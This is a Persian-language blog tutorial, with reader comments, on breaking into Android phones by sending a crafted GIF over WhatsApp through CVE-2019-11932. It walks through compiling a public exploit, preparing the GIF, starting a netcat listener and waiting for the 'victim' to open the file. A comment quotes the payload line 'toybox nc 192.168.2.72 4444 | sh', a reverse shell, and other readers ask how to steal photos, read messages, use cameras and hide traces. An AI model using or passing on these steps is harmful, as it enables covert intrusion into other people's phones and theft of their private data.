0
02128428905

آموزش نفوذ به اندروید از طریق فایل gif در واتس اپ

 

 

سلام خدمت تمامی کاربران عزیز وبسایت تیم امنیتی اولترا

 

در مطالب گذشته راجب هک کردن گوشی اندروید صحبت کردیم ، اما روش هایی که گفتیم بیشترش استفاده از فایل مخرب APK بود و خیلی از دوستان سوال پرسیدن بودن آیا روش های دیگری هم برای هک کردن گوشی اندروید وجود داره؟ قطعا وجود داره ولی اگر شما بخواهید حملات حرفه ای تری رو انجام بدید نیازمند دانش بالایی در این زمینه هستید ، یکی از روش هایی که خیلی برای نفوذ به گوشی اندروید ازش استفاده میشه فایل مخرب APK هست اما به دلیل استفاده خیلی زیاد از این روش کاربران نسبت به این حمله مقاوم شده اند و به راحتی نمیتونید فایل مخرب APK خودتون رو به قربانی بدید و اون به راحتی نصب کنه ، پس ما باید روش نفوذمون رو تغییر بدیم ، یکی از راه ها استفاده از آسیب پذیری هایی هست که برای سیستم عامل اندروید منتشر میشه که من راجب یکی از این آسیب پذیری ها به اسم StageFright در سایت صحبت کرده بودم که به لطف دوستان فیلترینگ مجبور شدیم پست رو از روی سایت حذف کنیم ، آسیب پذیری StageFright این اجازه رو به ما میداد تا از طریق فایل MP4 به گوشی اون شخص نفوذ کنیم که تو زمان خودش بی نظیر بود ، شاید خیلی ها بگن عجب روشی بوده که باید بگم روش خوبی بود ولی از اون بهترش هم هست 🙂 پس با ما همراه باشید تا از طریق فایل gif و فرستادنش از طریق واتس اپ برای قربانی به گوشیش دسترسی بگیریم.

 

 

مطالب پیشنهادی : 

 

آموزش نفوذ به گوشی های اندرویدی با ابزار SpyNote

 

آموزش نفوذ به گوشی های اندرویدی با ابزار AhMyth

 

 

توضیحی راجب آسیب پذیری واتس اپ (Whats App) :

آسیب پذیری به وجود آمده در واتس با شناسه CVE-2019-11932 دردسترس هست ، این آسیب پذیری از نوع double free vulnerability است که به ما امکان اجرا دستور دلخواه برروی سیستم عامل اندروید رو میده که ما با ارسال یک فایل gif در واتس اپ و اجرای اون توسط قربانی ما میتونیم به گوشی قربانی دسترسی بگیریم. این آسیب پذیری برروی نسخه واتس اپ ۲٫۱۹٫۲۴۴ به پایین کار میکنه و برروی نسخه های بالاتر این آسیب پذیری رفع شده است.

 

 

خب خیلی حرف زدم بهتره بریم سراغ کارمون 🙂 در اولین قدم من با دستور زیر اکسپلویت این آسیبپ پذیری رو دانلود میکنم

 

 

 

بعد از دانلود اکسپلویت وارد پوشه اکسپلویت میشیم و دستور make رو وارد میکنیم تا فایل های مورد نیاز ما رو کامپایل کنه که البته شما  با دستور زیر هم میتونید اینکار رو انجام بدید

 

 

gcc -o exploit egif_lib.c exploit.c

 

 

در این مرحله ما نیاز به یه فایل gif داریم که به دلخواه یک فایل gif رو انتخاب میکنیم که قراره این فایل gif رو به اکسپلویت بدیم تا تغییرات رو انجام بده و آماده استفاده بشه ، من از قبل یه فایل gif رو از اینترنت دانلود کردم و با دستور زیر فایل gif رو به اکسپلویت معرفی میکنم

 

 

 

خب الان فایل gif ما آمادست با دستور زیر ما ابزار NC رو روی حالت Listener میبریم تا بعد از اجرای gif توسط قربانی دسترسی ما به گوشی برقرار بشه

 

 

 

کافیه فایل gif خودمون رو از طریق واتس اپ برای قربانی ارسال کنیم

 

 

 

خب بعد از ارسال فایل gif منتظر میمونیم قربانی فایل gif رو اجرا کنه و بعد از اجرا دسترسی ما به گوشی برقرار میشه

 

 

 

امیدوارم که از این آموزش لذت کافی رو برده باشید اگر سوالی راجب این مطلب داشتید از بخش دیدگاه ها با ما در میان بزارید…

 

 

عنوان دانلود : آموزش نفوذ به اندروید از طریق فایل gif در واتس اپ
دیدگاه کاربران
  • Defalt 10 دسامبر 2019

    سلام خسته نباشین این مشکل داره و میگه چیزی بنام exploit وجود نداره

    • اشکان مقدس 10 دسامبر 2019

      سلام

      دستور make رو بزنید یا به صورت دستی فایل ها رو کامپایل کنید دستوراتش در پست اضافه شد

  • Rvrgodx 10 دسامبر 2019

    چه فایل هایی میشه ازش بیرون کشید …
    مثلا عکس و ویدیو و موزیک چه دستوراتی باید بزنیم ؟

    • اشکان مقدس 10 دسامبر 2019

      سلام

      شل سیستم عامل اندروید هست باید دستورات لینوکسی بلد باشید تا بتونید باهاش کار کنید

  • SorBlack 10 دسامبر 2019

    اول باید دستور make رو بزنی تا کار بده 🙂

  • رضا 10 دسامبر 2019

    سلام برا منم میزنه چیزی به اسم exploitوجود ندار؟؟؟

    • اشکان مقدس 10 دسامبر 2019

      سلام

      دستور make رو بزنید یا به صورت دستی فایل ها رو کامپایل کنید پست اپدیت شد مجدد مطالعه کنید

  • نووان 10 دسامبر 2019

    سلام لطفا نحوه ی تنظیم هاست و پورت رو میفرمایید؟ چون با ngrok کارمیکنم. ممنون

    • اشکان مقدس 10 دسامبر 2019

      سلام

      در سورس فایل exploit.c قابل تغییر هست چک کنید مشخصه

  • Ghost 10 دسامبر 2019

    سلام
    من تمام مراحل رو انجام دادم و واتساپ نسخه ۲٫۱۹٫۲۴۴ رو نصب کردم اما وقتی گیف رو داخل واتساپ باز میکنم هیچ Session ی باز نمیشه

    • اشکان مقدس 10 دسامبر 2019

      سلام

      در فایل exploit.c ای پی و پورت nc رو تغییر بدید گوشی قربانی در شبکه خودتون هست یا بیرون شبکه ؟

  • Evil 10 دسامبر 2019

    با این روش چه چیز هایی رو میشه کشید
    یعنی کلا سیستم عامل اندرویدش رو داریم
    این روش برای ویندوز هست،،،؟

    • اشکان مقدس 10 دسامبر 2019

      سلام

      شل سیستم عامل رو در اختیار دارید و برای ویندوز خیر

  • مهدی 12 دسامبر 2019

    با سلام
    می خواستم ببینم امکان داره که مهم ترین ابزار های موجود در کالی لینوکس را بیان کنید با یه سری اطلاعات دیگه؟

    • اشکان مقدس 12 دسامبر 2019

      سلام

      چشم حتما

  • مجید 13 دسامبر 2019

    سلام
    من بخوام هک کنم اول باید چه برنامه ای نصب کنم؟

    • اشکان مقدس 13 دسامبر 2019

      سلام

      کامل در پست توضیح دادیم اگر تازه کار هستید اول از شبکه و لینوکس که در قسمت پیشنیاز ها هست شروع کنید

  • مهدی 13 دسامبر 2019

    باسلام
    ببخشید آیا درگاه خرید مشکلی داره؟
    هرچی امتحان میکنم برا خرید نمیشه

    • اشکان مقدس 13 دسامبر 2019

      سلام

      اگر از وی پی ان استفاده میکنید خاموش کنید موقع خرید

  • مهدی 14 دسامبر 2019

    با سلام
    برای یادگرفتن پایتون چه آموزش هایی ببینم که هر برنامه تی خاستم باهاش بسازم

  • q 15 دسامبر 2019

    char *command = “toybox nc 192.168.2.72 4444 | sh”; این قسمتو باس تغییر بدیم

    • اشکان مقدس 15 دسامبر 2019

      سلام

      بله با ای پی و پورت مورد نظرتون باید تغییر کنه

  • q 15 دسامبر 2019

    برای حل خطاهای کامپایل گروه ندارید

    • اشکان مقدس 15 دسامبر 2019

      سلام

      خیر سرچ کنید راهکار براش هست

  • amin 16 دسامبر 2019

    توی ترموکس هم میشه این مار رو انجام داد

    • اشکان مقدس 16 دسامبر 2019

      سلام

      اینطور حملات رو پیشنهاد نمیشه با ترموکس انجام بدید چون محدوده

  • mmd 19 دسامبر 2019

    slm va khaste nabashid
    en cod ha ro bayad dar che narmafzari bezanim

    • اشکان مقدس 19 دسامبر 2019

      سلام

      این دستورات رو در ترمینال لینوکس باید بزنید

  • مهدی 20 دسامبر 2019

    با سلام
    می خواستم ببینم چه پورتی را باید وارد کنم؟

  • مهدی 24 دسامبر 2019

    سلام یوزیرنیم و پسورد میخواد بعد از وارد کردن ادرس github

    • اشکان مقدس 25 دسامبر 2019

      سلام

      از چه سیستم عاملی استفاده میکنید؟ یه اسکرین بدید

  • Mainifem 25 دسامبر 2019

    سلام توی ترموکس هم میشه انجام داد؟ اخه من زدم موقع کامپایل پنج تا اشکال گرفت از فایل

    • اشکان مقدس 25 دسامبر 2019

      سلام

      بنده امتحان نکردم ولی اسکرین بدید بررسی کنم

  • Msdr 25 دسامبر 2019

    سلام من فایلو تو یه گوشی دیگه بازش کردم اما متصل نشد

    • اشکان مقدس 25 دسامبر 2019

      سلام

      ای پی و پورت رو در فایل exploit.c تغییر بدید و چک کنید که حتما پورت فورواردینگ انجام شده باشه

  • علیرضا 1 ژانویه 2020

    عالی جواب داد

  • Ghost 8 آوریل 2020

    سلام….اگ میشه لطفا کدایی که میتونیم باهاش پیامای واتساپو بخونیم و …… به ایمیلم بفرستید…ممنون

  • نیمی 13 آوریل 2020

    با سلام
    توی ورژن جدید gbwhatspp هم این باگ‌ برطرف شده یا خیر؟!
    برنامه های‌دیگع ای برای اندروید مثل این باگ نییست که دسترسی کامل بده؟!

    • اشکان مقدس 13 آوریل 2020

      سلام

      نسخه آسیب پذیر ذکر شده

  • R.hacker 27 مه 2020

    سلام
    میشه این آموزش رو بصورت ویدئو برامون بزارین
    ممنون میشم🙏🌷

  • amirreza77rojina 31 مه 2020

    سلام ببخشید با اوبونتو هک کنیم یا با کالی؟

  • amirreza77rojina 31 مه 2020

    اگه بخوایم ردی از خودمون بجای نزاریم چی؟
    راه حلی هست؟

  • حکیر ناصا افغانستان 6 ژوئن 2020

    سلام هنوزم کار میکنه این روش یا منسوخ شده؟ :/

  • soheil 3 آگوست 2020

    دستورات لینوکسی برای استفاده ازش هم بزارید مثلا چجوری از دوربین طرف استفاده کنیم یا موزیکش رو بگیریم مگر نه ساختنش چه بدردمون میخوره!!!

  • علی 24 آگوست 2020

    می شه تو ویندوز دانلودش کنم این برنامرو

ارسال دیدگاه

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *